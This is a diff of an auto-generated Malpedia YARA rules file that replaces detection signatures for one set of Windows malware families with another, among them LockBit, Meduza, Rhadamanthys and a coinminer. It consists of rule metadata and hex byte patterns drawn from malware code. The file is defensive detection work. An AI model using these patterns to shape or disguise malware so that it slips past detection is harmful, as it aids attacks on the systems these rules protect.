+		$sequence_9 = { 4c89b818080000 4c89b820080000 4c89b828080000 4c89b830080000 4c89b838080000 4c89b840080000 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Tiop_Auto : FILE
+rule MALPEDIA_Win_Coinminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7759473d-7c21-529d-8c5c-8c80ad3dfcde"
+		id = "dd71a564-9751-5c18-a6bf-b9b0587239f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiop_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coinminer_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9d95462dbb557911b61e12f852944c9e17315546dfa96a6eb7c9f227ec2b38c0"
+		logic_hash = "c6e378240c8214f1ad0ec61fc8d57006e837b16f1716923b20f2ac30be5b248c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96478,32 +96712,32 @@ rule MALPEDIA_Win_Tiop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd7 8d4c241c a3???????? e8???????? 8b10 53 8bc8 }
-		$sequence_1 = { 57 8965e8 8b4508 8d7004 8975e4 }
-		$sequence_2 = { 51 50 ffd7 83c408 85c0 7555 8b4604 }
-		$sequence_3 = { 64a100000000 50 64892500000000 83ec08 b8fc120000 e8???????? }
-		$sequence_4 = { 51 55 ff15???????? 8b7c2410 56 8b35???????? }
-		$sequence_5 = { 8d542414 68???????? f3ab 52 ffd3 83c414 85c0 }
-		$sequence_6 = { 68???????? 64a100000000 50 64892500000000 83ec08 56 33f6 }
-		$sequence_7 = { c64424388d c6442439b5 c644242c81 c644242dc3 c644243e85 c644243fff }
-		$sequence_8 = { 8d542410 53 8944247c 53 894c2468 89542474 }
-		$sequence_9 = { 8bf8 ff5204 894708 a1???????? 50 57 }
+		$sequence_0 = { 8b8d24e5ffff 8b0485a05f9a00 f644010440 7409 803a1a 7504 33c0 }
+		$sequence_1 = { 8b85f0feffff 85c0 7509 33d2 }
+		$sequence_2 = { 83c801 85c0 741d 8d85d4fdffff }
+		$sequence_3 = { ebcc 5f 5e 33c0 5b 8be5 }
+		$sequence_4 = { c7465c60fd8f00 83660800 33ff 47 897e14 }
+		$sequence_5 = { ff15???????? 6683bc24b002000000 8d8c24b0020000 ba???????? }
+		$sequence_6 = { 7e58 bc80304a3e 60 4c 1c00 59 6443 }
+		$sequence_7 = { 57 6868060000 0f57c0 894c2440 8d8424ec000000 c744242400004000 }
+		$sequence_8 = { c3 8b04c50c509000 5d c3 55 8bec 8b4508 }
+		$sequence_9 = { 8304240d cb 8d85b0fdffff 8945fc 85c0 745d 8b4df0 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 1523712
 }
-rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
+rule MALPEDIA_Win_Hdmr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fbc76f02-e283-5cc2-95ab-feddb32988f8"
+		id = "d7c2af72-912d-5503-a152-e44806d38df1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhadamanthys_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hdmr_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9730ed3bce4b206712bfc32009b2e0a70bda3b8b9f39f72ed960449e1927c991"
+		logic_hash = "ee139c0aa91276df8e246776ac0e0dc9525d3fadc5574673ef7224c9dd7d71ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96517,32 +96751,32 @@ rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7308 03c6 50 8b03 }
-		$sequence_1 = { 8a01 84c0 7416 8b542408 69d293010001 }
-		$sequence_2 = { 33d0 41 89542408 ebe4 }
-		$sequence_3 = { 7416 8b542408 69d293010001 0fb6c0 33d0 41 }
-		$sequence_4 = { 8b542408 69d293010001 0fb6c0 33d0 41 89542408 ebe4 }
-		$sequence_5 = { 7416 8b542408 69d293010001 0fb6c0 33d0 }
-		$sequence_6 = { 84c0 7416 8b542408 69d293010001 0fb6c0 }
-		$sequence_7 = { 7416 8b542408 69d293010001 0fb6c0 33d0 41 89542408 }
-		$sequence_8 = { 84c0 7416 8b542408 69d293010001 0fb6c0 33d0 }
-		$sequence_9 = { 84c0 7416 8b542408 69d293010001 }
+		$sequence_0 = { 8b06 8b9094000000 8bce ffd2 8b10 8bc8 }
+		$sequence_1 = { 337008 8955fc 33de 8b75f8 33fe 81e7ff00ff00 33780c }
+		$sequence_2 = { 2bf7 8bff 0fb719 0fb73c0e }
+		$sequence_3 = { 51 e8???????? 8bf0 89470c 8b450c 83c404 8bd6 }
+		$sequence_4 = { ffd7 83c614 ff4c240c 0f8562ffffff 33d2 68fe070000 52 }
+		$sequence_5 = { 0f84e1030000 6a00 6a00 6a00 }
+		$sequence_6 = { 7424 8b06 8b9094000000 8bce }
+		$sequence_7 = { 8d45cc 50 c745cce86b4100 e8???????? 8b7508 bf63736de0 393e }
+		$sequence_8 = { 56 8d3c8540d04100 e8???????? 83e01f 59 }
+		$sequence_9 = { 8bce ffd2 8b10 4f 57 8bc8 }
 
 	condition:
-		7 of them and filesize < 1111040
+		7 of them and filesize < 284672
 }
-rule MALPEDIA_Win_Appleseed_Auto : FILE
+rule MALPEDIA_Win_Alma_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6233653f-8647-5513-96a5-b2cd884fdea1"
+		id = "ce864cf3-8ed9-5a77-84b9-9123b66a46f1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.appleseed_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alma_locker_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "142435c8e7521abcc92619a4e86e241d8250a7e1e464619e8d897ededc2c5423"
+		logic_hash = "8cabf41a3f65a5dd2317b51829855a0a62bf40db235945e5f426bc09d1925bbb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96556,32 +96790,32 @@ rule MALPEDIA_Win_Appleseed_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4989742410 41c6042400 49837f1810 7208 498b0f e8???????? 49c747180f000000 }
-		$sequence_1 = { 0f8414010000 488d15d2160200 488d4db8 e8???????? 90 488d55d8 488bc8 }
-		$sequence_2 = { 48894c2470 33f6 89742440 48c741180f000000 48897110 408831 4533c0 }
-		$sequence_3 = { 48837dd010 7209 488b4db8 e8???????? 48833d????????00 0f847c180000 48c745d00f000000 }
-		$sequence_4 = { 480f434daf 488b5d07 4c8bc3 4c8b75bf 4c3bf3 4d0f42c6 4d85c0 }
-		$sequence_5 = { 4889742440 4088742430 448d463c 488d1524b40100 488d4c2430 e8???????? 90 }
-		$sequence_6 = { 488b5c2438 4883c420 5e c3 488d0d887c0200 e8???????? }
-		$sequence_7 = { 48897310 c60300 48837d9810 7209 488b4d80 }
-		$sequence_8 = { e8???????? 488325????????00 4883c428 c3 488d05310a0200 c3 4053 }
-		$sequence_9 = { 488bfa 488bf1 4533f6 4489742460 44887580 33d2 41b8ff030000 }
+		$sequence_0 = { 750d e8???????? 84c0 0f8461010000 e8???????? 833d????????00 }
+		$sequence_1 = { 8b08 ff5108 8b45ac 50 8b08 ff5108 }
+		$sequence_2 = { c745e800000000 c645d800 720b ff75c0 e8???????? 83c404 83ec18 }
+		$sequence_3 = { 8b85f8fbffff 0f438de8fbffff ffb538f9ffff c785e4fbffff0f000000 c785e0fbffff00000000 8d0441 c685d0fbffff00 }
+		$sequence_4 = { 1bc0 f7d8 0f854affffff 8b8580fbffff 51 83c0fe 8d8d70fbffff }
+		$sequence_5 = { 8d558c c645fc04 8d4dbc e8???????? 83c404 c645fc06 837db810 }
+		$sequence_6 = { 33c0 c645fc0d 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 }
+		$sequence_7 = { 0f8412000000 83a5e0fffefffe 8b8de8fffeff e9???????? c3 8b542408 8d420c }
+		$sequence_8 = { c78598fbffff00000000 c7859cfbffff0f000000 720e ffb558fbffff e8???????? 83c404 83bdccfbffff08 }
+		$sequence_9 = { 83bd9cfbffff10 c78584fbffff0f000000 c78580fbffff00000000 c68570fbffff00 720e ffb588fbffff }
 
 	condition:
-		7 of them and filesize < 497664
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Nefilim_Auto : FILE
+rule MALPEDIA_Win_Helminth_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f770afff-845f-5499-a82e-ad8c0e6c9614"
+		id = "5fdf8a25-7bbd-5109-b9cb-02cfb27261a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nefilim_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.helminth_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "84fb3ca9c75650a6b701073468d1bedd054df919eaf8258d3aea8d2bb0356db2"
+		logic_hash = "fef76838e29eb47ff0f2e451721fe0e767720682455a5aea55c0645b1ef1cd31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96595,34 +96829,39 @@ rule MALPEDIA_Win_Nefilim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? 50 ff15???????? 57 8bf0 }
-		$sequence_1 = { 7304 8d442414 68???????? 50 ffd6 85c0 0f84dc000000 }
-		$sequence_2 = { 50 ffd6 85c0 0f849b040000 68???????? 8d8424d0000000 }
-		$sequence_3 = { 0f8f5d010000 8b4c2418 394c2428 0f822dffffff e9???????? }
-		$sequence_4 = { 3b5d0c 72b3 5e 8b8538ffffff 6a10 2bf8 }
-		$sequence_5 = { 33c0 50 50 ff74241c ffd7 53 8d442434 }
-		$sequence_6 = { 8bf0 ffd3 50 57 e8???????? }
-		$sequence_7 = { 68???????? 50 ffd6 85c0 0f84a0000000 8b442414 397c2428 }
-		$sequence_8 = { 8b4de0 a3???????? 7303 8d4de0 }
-		$sequence_9 = { c9 c3 55 8bec 83e4f8 81ecec020000 a1???????? }
+		$sequence_0 = { a1???????? 68e8030000 8907 e8???????? }
+		$sequence_1 = { 2bc6 3bd8 a1???????? 7f5e 8d3c81 }
+		$sequence_2 = { 8bd8 85db 0f84bc000000 8bcb 8d5102 668b01 83c102 }
+		$sequence_3 = { 83e11f c1e106 8b048570750110 80640804fe ff36 e8???????? }
+		$sequence_4 = { 8a441918 8881a8670110 41 ebe8 8975e4 }
+		$sequence_5 = { 56 ff15???????? 56 e8???????? 8b35???????? 83c404 8b0d???????? }
+		$sequence_6 = { 8bca 894c2408 8d9b00000000 668b02 83c202 6685c0 75f5 }
+		$sequence_7 = { 66893441 8b1a ff15???????? 8bc3 8d5002 668b08 }
+		$sequence_8 = { 83f8ff 0f84ac000000 8d442418 50 56 }
+		$sequence_9 = { 8945dc 8d45cc 50 6a02 }
+		$sequence_10 = { 51 e8???????? 8b55e8 03f6 59 }
+		$sequence_11 = { 8bd0 b9???????? 8995c8fbffff 2bd1 }
+		$sequence_12 = { f3a5 8bca 83e103 f3a4 8b7c2414 83ef02 }
+		$sequence_13 = { eb1c 56 ff15???????? 57 ff15???????? }
+		$sequence_14 = { e8???????? 8b75f0 43 59 eb31 }
 
 	condition:
-		7 of them and filesize < 142336
+		7 of them and filesize < 479232
 }
-rule MALPEDIA_Win_Unidentified_070_Auto : FILE
+rule MALPEDIA_Win_Lockbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc99ca5b-4d55-52a4-9778-97da0dfa2869"
+		id = "4ed7dbc7-3585-5c20-a9ac-479c38ded866"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_070_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockbit_auto.yar#L1-L210"
 		license_url = "N/A"
-		logic_hash = "2ece2222d59166146594c492cc62e3c6aa195983d54a5768c5b3c1160f95e1d0"
+		logic_hash = "d83c3bb6fdeb9666252e892916a121a76bca2329b4383b39f3b9be802c917095"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -96634,32 +96873,43 @@ rule MALPEDIA_Win_Unidentified_070_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_1 = { 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_2 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_3 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_5 = { 33c0 c20400 3b0d???????? 7502 }
-		$sequence_6 = { 6a00 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_7 = { 83f8ff 50 0f95c3 ff15???????? 8d85f4fdffff }
-		$sequence_8 = { 6a00 6a00 6800200000 6a01 8d8424e8000000 }
-		$sequence_9 = { 6a00 6a00 68???????? 8d85f4fdffff 50 6a00 }
+		$sequence_0 = { 66ad 90 6683f841 720b 6683f85a 7705 }
+		$sequence_1 = { 7407 3d9bb4840b 7518 8b4e0c 03cb }
+		$sequence_2 = { 6a00 6a00 6800000040 ff75d4 }
+		$sequence_3 = { 8bec 81ec7c030000 53 56 57 8d9d84fcffff }
+		$sequence_4 = { 66b82000 f266af 85c9 7512 }
+		$sequence_5 = { 8d8550fdffff 50 6a00 ff15???????? }
+		$sequence_6 = { 33c0 8d7df0 33c9 53 }
+		$sequence_7 = { 660f73f904 660fefc8 0f28c1 660f73f804 }
+		$sequence_8 = { 50 8d45fc 50 ff75fc ff75f4 }
+		$sequence_9 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 }
+		$sequence_10 = { 5b 8907 897704 894f08 89570c f745f800000002 740c }
+		$sequence_11 = { 47 4e 85f6 75d2 5d 5f 5e }
+		$sequence_12 = { 03d0 90 85c0 75e1 8bc2 5e 5a }
+		$sequence_13 = { 89570c f745f800000002 740c 5f 5e b801000000 }
+		$sequence_14 = { 57 8d9d84fcffff b900c2eb0b e2fe e8???????? 53 }
+		$sequence_15 = { ff759c 8d858cfeffff 50 ff7610 51 e8???????? 83c628 }
+		$sequence_16 = { 8d45f4 50 6a00 6a00 ff15???????? }
+		$sequence_17 = { 8bfb 895830 33fe 897834 8bf7 }
+		$sequence_18 = { 894f64 33d6 8b7510 895768 8bda }
+		$sequence_19 = { 740b 83e904 8b040e 89040f }
+		$sequence_20 = { 740b 83e902 0fb7040e 6689040f f6c204 7409 83e904 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 2049024
 }
-rule MALPEDIA_Win_Bubblewrap_Auto : FILE
+rule MALPEDIA_Win_Xtinyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8af5c082-aa6b-50c2-beb7-d15cea5a0e28"
+		id = "18e6856e-e403-5601-8fbf-f7925fca3610"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bubblewrap_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtinyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xtinyloader_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9768a3ec06517eeb8d4ed3cf1b68ed17318c56d44232a674eb24375a5c01ec8d"
+		logic_hash = "b857d545e3495e8e215ff8dbc4483cf1ba89c02a05d887dc31b61d1a2d74f26a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96673,32 +96923,32 @@ rule MALPEDIA_Win_Bubblewrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c9ff f2ae f7d1 49 c605????????ee c605????????03 }
-		$sequence_1 = { c21000 55 68???????? 6a01 6a00 ff15???????? }
-		$sequence_2 = { 8915???????? 8b15???????? a3???????? 66a1???????? 880d???????? b910000000 }
-		$sequence_3 = { 8bca 89442414 83e103 55 }
-		$sequence_4 = { 83e103 f3a4 8dbc24ac000000 83c9ff }
-		$sequence_5 = { e8???????? 83c408 be???????? b8???????? 8a10 }
-		$sequence_6 = { c1e902 f3a5 8bca 83e103 f3a4 be???????? b8???????? }
-		$sequence_7 = { 8bc1 894c2414 3bc5 0f821cffffff 8b6c2424 b967010000 33c0 }
-		$sequence_8 = { 8b0d???????? 8b15???????? 894c0435 b920000000 8d742434 bf???????? }
-		$sequence_9 = { 8b15???????? f2ae f7d1 49 bf???????? }
+		$sequence_0 = { ff35???????? e8???????? 8b35???????? 83c448 8944241c 85db 7409 }
+		$sequence_1 = { 7437 57 ff15???????? 85c0 7425 56 }
+		$sequence_2 = { e8???????? 50 ff35???????? e8???????? a3???????? 0fb605???????? 83c444 }
+		$sequence_3 = { ff45fc 8b45fc 3b45f4 72be 33c0 5f 5e }
+		$sequence_4 = { 8d45f8 50 8b450c 2bc7 }
+		$sequence_5 = { 85c0 7442 8b45fc 8b0c86 8b450c }
+		$sequence_6 = { 8b5d08 b84d5a0000 663903 7407 33c0 e9???????? }
+		$sequence_7 = { 57 ff15???????? 85c0 0f8450010000 8d45f8 }
+		$sequence_8 = { 57 895de4 895df4 895dec }
+		$sequence_9 = { 7459 393d???????? 7451 393d???????? }
 
 	condition:
-		7 of them and filesize < 57136
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Grimagent_Auto : FILE
+rule MALPEDIA_Win_Meduza_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71af2f17-8403-52ad-833c-4f34c39aa4f9"
+		id = "e3895974-72b9-57f5-8c34-0e6d028adf2b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grimagent_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meduza_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2bd16393ddc9027f65320f9d7195e30024d5bd5433e4f4effa16eae0aefd4e45"
+		logic_hash = "91edd922ee662fa1f50c4b9c5768d207acd5144b81bbe8f2830a6c18fd7c29e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96712,32 +96962,32 @@ rule MALPEDIA_Win_Grimagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec18 c745f400000000 c745f800000000 c745e800000000 8b4508 8945f0 }
-		$sequence_1 = { 8b4d0c 51 e8???????? 83c404 3945f8 7328 8b55ec }
-		$sequence_2 = { 85c0 7420 8b4d08 51 8d95f4feffff 52 e8???????? }
-		$sequence_3 = { 83c404 3945f8 750e c745e801000000 b801000000 eb1a 8b4df0 }
-		$sequence_4 = { 0f8394000000 8b4df0 0fb711 8b45fc }
-		$sequence_5 = { 8b45ec 83c002 8945ec 8b4dfc 83c102 894dfc eb02 }
-		$sequence_6 = { 85c0 7420 8b4d08 51 8d95f4feffff }
-		$sequence_7 = { 83c404 3945f8 750e c745e801000000 }
-		$sequence_8 = { 8b4508 0fbe08 85c9 7426 }
-		$sequence_9 = { 8b4508 8945f0 8b4d0c 894dfc c745f400000000 eb09 8b55f4 }
+		$sequence_0 = { 8b8d7cf2ffff 0f288d90ebffff 898decf8ffff 8d8d90ebffff 8985e8f8ffff 8d5101 660fef8de0f8ffff }
+		$sequence_1 = { 898db4f8ffff 8985b0f8ffff c78548f8ffff22b9d72e c7854cf8ffff97001a04 8b8548f8ffff 8b8d4cf8ffff c5fe6f8540f1ffff }
+		$sequence_2 = { 898d54f9ffff c785d8e4ffff12b8295c c785dce4ffffd94ef7ef 8b85d8e4ffff 8b8ddce4ffff 898558f9ffff 898d5cf9ffff }
+		$sequence_3 = { 0f288d00edffff 898d5cfaffff 8d8d00edffff 898558faffff 8d5101 660fef8d50faffff 0f298d00edffff }
+		$sequence_4 = { 8b4908 8d5801 2bca 895de0 c1f904 b8ffffff0f 8bd1 }
+		$sequence_5 = { 0f1f440000 8a01 41 84c0 75f9 2bca 8d8530e1ffff }
+		$sequence_6 = { c78578fdffff88642bdd c7857cfdffff13203a28 8b8578fdffff 8b8d7cfdffff 898d2cfeffff 898528feffff c78578fdffff6d0b2891 }
+		$sequence_7 = { 6aff 68???????? 64a100000000 50 53 81eca8060000 a1???????? }
+		$sequence_8 = { c5f8298d80f4ffff c5f81185e8e8ffff c785f8e8ffff00000000 c785fce8ffff00000000 c5f877 8a01 41 }
+		$sequence_9 = { 51 52 e8???????? 83c408 eb08 85c9 0f85a9000000 }
 
 	condition:
-		7 of them and filesize < 582656
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Headertip_Auto : FILE
+rule MALPEDIA_Win_Artfulpie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1dda5df3-2437-55ec-aee3-662480184ff3"
+		id = "de5450b6-b95f-5bac-b0a9-b9c5fd386b22"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.headertip_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.artfulpie_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "a8e98ab682cf8297008cac86233820760ccd69da30239b18014120d2702bf71b"
+		logic_hash = "6beac333cee4f67e44a4d36d19350c582ab6bfc4c8f39d10f4335fab88933e77"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96751,32 +97001,32 @@ rule MALPEDIA_Win_Headertip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645e465 c645e573 c645e674 c645e757 885de8 }
-		$sequence_1 = { 8b450c 48 753a 8b4508 }
-		$sequence_2 = { 0f845b020000 8d4d34 51 50 ff15???????? a3???????? }
-		$sequence_3 = { 84c9 75f1 c20400 8b542404 33c0 85d2 }
-		$sequence_4 = { 56 57 64a130000000 8b400c 8b7014 8bfe }
-		$sequence_5 = { c6451d74 c6451e45 c6451f72 c6452072 c645216f c6452272 885d23 }
-		$sequence_6 = { ff7508 ff35???????? ff15???????? 85c0 7528 }
-		$sequence_7 = { 68???????? be???????? 56 c705????????19100010 c705????????5b120010 ff15???????? }
-		$sequence_8 = { 58 668945f4 668945f6 6a33 58 668945f8 6a32 }
-		$sequence_9 = { 33c0 5f 5b 5e c3 0fb7c7 }
+		$sequence_0 = { ff15???????? 85c0 0f8527010000 0f1f4000 8b430c 85c0 0f8418010000 }
+		$sequence_1 = { c745fc00000000 85c0 7406 50 e8???????? 8b4df4 b801000000 }
+		$sequence_2 = { 8db8b44b4100 57 ff15???????? ff0d???????? 83ef18 }
+		$sequence_3 = { 894de0 8b049d984e4100 0fb6440828 83e001 }
+		$sequence_4 = { 50 ffd2 85c0 7477 8b46fc 57 }
+		$sequence_5 = { c745ec00000000 50 8d45ec c745e404000000 50 }
+		$sequence_6 = { 85c0 0f84af000000 6a04 6800100000 }
+		$sequence_7 = { 8b3e 8b4630 48 f7d0 }
+		$sequence_8 = { 6af6 ff15???????? 8b04bd984e4100 834c0318ff 33c0 }
+		$sequence_9 = { f00fc118 4b 7515 8b45fc 817848f8444100 7409 }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Rgdoor_Auto : FILE
+rule MALPEDIA_Win_Onliner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2eb99ad7-9e75-5845-969c-c304a1478e04"
+		id = "e266190c-77cd-5e00-b175-da1e4e33561c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rgdoor_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onliner_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fb170bfaa8b6f4f88bfae97b02b3770495bd4a9f8715b2816fb97989dc207528"
+		logic_hash = "c9e55a1b6192aded12d9bdf9f70d961ece286b9f8d470b491a50250894e58dcc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96790,71 +97040,71 @@ rule MALPEDIA_Win_Rgdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0dbe380200 4c8b442448 488b542438 488b4c2440 83bc24c800000000 7413 }
-		$sequence_1 = { 488d0d53170100 e8???????? 85c0 754a 488d0d774a0000 e8???????? 488d152f170100 }
-		$sequence_2 = { ff15???????? 488d15e3580100 483305???????? 488bcb 488905???????? ff15???????? 488d15e5580100 }
-		$sequence_3 = { 4c8d25d8310200 83e01f 4c6bf858 498b04fc 420fbe4c3808 83e101 7449 }
-		$sequence_4 = { 488d4c2420 41b801000000 4889442458 e8???????? 488d05e6840100 488d154f530200 488d4c2420 }
-		$sequence_5 = { e8???????? 4c8bf8 4889842488000000 4885c0 }
-		$sequence_6 = { 4863ca 0fb7444b0c 6641898448c0410300 ffc2 ebe2 8bd7 }
-		$sequence_7 = { e8???????? 488bf0 488b8de0000000 48635104 }
-		$sequence_8 = { e9???????? 488d8a98000000 e9???????? 488d8ae0010000 e9???????? 488d8a60000000 e9???????? }
-		$sequence_9 = { 4c8d3d6c3c0100 4c8d6738 4c8d05e13d0100 488bd3 498bce e8???????? }
+		$sequence_0 = { ff15???????? 8bf0 85f6 0f85ab000000 8b45f8 8945f4 e9???????? }
+		$sequence_1 = { 58 e8???????? 0f8436010000 a1???????? e8???????? 3c01 7412 }
+		$sequence_2 = { 058a4c2a8d ba14000000 e8???????? 03c7 8bf0 8bc7 33c6 }
+		$sequence_3 = { 8910 33c0 8ac3 8d448604 8b17 e8???????? 8b17 }
+		$sequence_4 = { e8???????? ff75ec 8b45fc e8???????? 0fb7c0 8d55e4 e8???????? }
+		$sequence_5 = { eb41 83c0bf 83e81a 7225 83c0fa 83e81a }
+		$sequence_6 = { 837df800 750f 8bc3 8b55fc e8???????? e9???????? 8b45f8 }
+		$sequence_7 = { 8bd7 e8???????? 8b0424 833800 742e 8b0424 }
